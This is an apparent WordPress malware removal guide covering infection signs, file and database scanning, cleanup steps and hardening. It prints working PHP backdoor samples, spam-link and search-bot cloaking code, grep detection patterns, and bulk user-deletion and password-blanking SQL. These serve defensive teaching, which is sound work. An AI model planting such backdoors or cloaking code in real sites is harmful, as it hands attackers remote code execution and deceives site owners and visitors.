WordPress Malware Analysis and Removal Guide

Identify, analyze, and remove malware from WordPress sites with systematic scanning and cleaning procedures.

Sarah Chen

Malware infection requires methodical identification and thorough removal. Incomplete cleanup leads to reinfection. Follow this systematic approach.

Signs of Malware Infection

Visible Symptoms

  • Redirects to spam sites
  • Unknown content or pages
  • Defaced website
  • Pop-up advertisements
  • Slow site performance
  • Google safe browsing warnings

Hidden Indicators

  • Unknown admin users
  • Modified .htaccess files
  • Strange cron jobs
  • Unusual database entries
  • Encoded PHP in files
  • Unexpected file changes

Scanning for Malware

Manual File Analysis

# Find recently modified files
find /path/to/wordpress -type f -mtime -7 -name "*.php"

# Search for common malware patterns
grep -r "eval(base64_decode" /path/to/wordpress
grep -r "gzinflate(base64" /path/to/wordpress
grep -r "str_rot13" /path/to/wordpress
grep -r "\$_REQUEST\[" /path/to/wordpress/wp-content

# Find files with suspicious names
find /path/to/wordpress -name "*backdoor*"
find /path/to/wordpress -name "*.php.suspected"
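The checks above, gathered into one small scanner as an added example (not code from the original article or from WP Folder Shield). It applies the grep patterns to every PHP file, flags PHP files under wp-content/uploads (none belong there), and lists PHP files changed within a window; the patterns are loosened with `@?` so the `@eval(@base64_decode` form shown later under Common Malware Types is caught too. The 7-day window, the sample tree it builds and the category names are assumptions.

```shell
#!/bin/sh
# Added example: apply the article's file-analysis indicators to a WordPress tree.
# Patterns are grep -E alternatives, one per line; "@?" tolerates PHP's error
# suppression operator, which the plain "eval(base64_decode" search would miss.
MALWARE_PATTERNS='eval\(@?base64_decode
gzinflate\(base64
str_rot13\(
\$_REQUEST\['

# scan_wp_tree ROOT [DAYS]: print "category: path" lines, sorted and de-duplicated.
scan_wp_tree() {
    root=$1
    days=${2:-7}   # assumption: a week is a reasonable "recent" window for triage
    {
        find "$root" -type f -name '*.php' -exec grep -lE "$MALWARE_PATTERNS" {} + 2>/dev/null \
            | sed 's|^|pattern: |'
        find "$root/wp-content/uploads" -type f -name '*.php' 2>/dev/null \
            | sed 's|^|php-in-uploads: |'
        find "$root" -type f -name '*.php' -mtime "-$days" 2>/dev/null \
            | sed 's|^|recent: |'
    } | sort -u
}

# count_findings ROOT CATEGORY: how many findings fall in one category.
count_findings() {
    scan_wp_tree "$1" | grep -c "^$2: " || true
}

# make_sample_tree DIR: build a constructed (fake) site: one clean, backdated core
# file, one obfuscated backdoor in a theme, one backdoor dropped into uploads.
make_sample_tree() {
    mkdir -p "$1/wp-includes" "$1/wp-content/uploads/2024" "$1/wp-content/themes/t"
    printf '<?php function wp_clean() { return 1; }\n' > "$1/wp-includes/clean.php"
    printf '<?php @eval(@base64_decode($_POST["x"]));\n' > "$1/wp-content/themes/t/footer.php"
    printf '<?php if(isset($_REQUEST["cmd"])){ eval($_REQUEST["cmd"]); }\n' \
        > "$1/wp-content/uploads/2024/image.php"
    # Backdate the clean core file so it falls outside the "recent" window.
    touch -t 202001010000 "$1/wp-includes/clean.php"
}

# Demo run on the constructed tree; point scan_wp_tree at a real docroot instead.
demo_dir=$(mktemp -d)
make_sample_tree "$demo_dir"
scan_wp_tree "$demo_dir"
rm -rf "$demo_dir"
```

A hit in "pattern" is a lead, not proof: legitimate plugins occasionally use these functions, so read the file before deleting it.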

Database Scanning

-- Search for injected scripts in posts, and posts changed in the last 30 days
SELECT ID, post_title, post_modified FROM wp_posts
WHERE post_content LIKE '%<script%'
   OR post_modified > DATE_SUB(NOW(), INTERVAL 30 DAY);

-- Look for suspicious options
SELECT * FROM wp_options
WHERE option_name LIKE '%base64%'
OR option_value LIKE '%eval(%';

Common Malware Types

Backdoor Files

// Typical backdoor pattern
<?php
if(isset($_REQUEST['cmd'])){
    eval($_REQUEST['cmd']);
}
?>

// Obfuscated version
<?php @eval(@base64_decode($_POST['x'])); ?>

Spam Injection

// Hidden links injection (container is display:none, so visitors never see it)
echo '<div style="display:none">'.$spam_links.'</div>';

// Conditional injection (only served to search bots, so the owner never sees it)
if(strpos($_SERVER['HTTP_USER_AGENT'],'Googlebot') !== false){
    include('spam.php');
}

Removal Process

Step 1: Isolate the Site

  • Take site offline or enable maintenance mode
  • Change all passwords immediately
  • Revoke all access tokens
  • Backup current state for analysis

Step 2: Clean Core Files

# Download fresh WordPress
wget https://wordpress.org/latest.tar.gz
tar -xzf latest.tar.gz

# Compare core directories against the fresh copy (reports files that differ or only exist on one side)
diff -rq wordpress/wp-admin/ infected-site/wp-admin/
diff -rq wordpress/wp-includes/ infected-site/wp-includes/

# Replace wp-admin and wp-includes entirely
rm -rf infected-site/wp-admin infected-site/wp-includes
cp -r wordpress/wp-admin infected-site/
cp -r wordpress/wp-includes infected-site/

Step 3: Clean wp-content

  • Delete unknown plugins
  • Reinstall plugins from fresh downloads
  • Scan uploads for PHP files
  • Check theme files against originals

Step 4: Database Cleanup

-- Remove malicious admin users
DELETE FROM wp_users WHERE ID NOT IN (/*known IDs*/);
DELETE FROM wp_usermeta WHERE user_id NOT IN (/*known IDs*/);

-- Clean infected posts
UPDATE wp_posts
SET post_content = REPLACE(post_content, 'malicious_code', '')
WHERE post_content LIKE '%malicious_code%';

-- Reset user passwords
UPDATE wp_users SET user_pass = '' WHERE user_login != 'your_admin';

Step 5: Security Hardening

  • Update WordPress, plugins, themes
  • Change all credentials
  • Generate new security keys
  • Implement security plugin
  • Enable two-factor authentication

Post-Cleanup Verification

Verify Clean State

  • Run security scans again
  • Check Google Search Console
  • Submit for malware review if blocklisted
  • Monitor for reinfection

Preventing Reinfection

  • Identify and fix entry point
  • Update all software
  • Remove unused plugins/themes
  • Strengthen access controls
  • Implement monitoring

Conclusion

Malware removal requires thoroughness. Clean core files, scan wp-content, check the database, and implement protections. Incomplete cleanup leads to reinfection. When in doubt, rebuild from clean backups.

Written by Sarah Chen

WP Folder Shield Team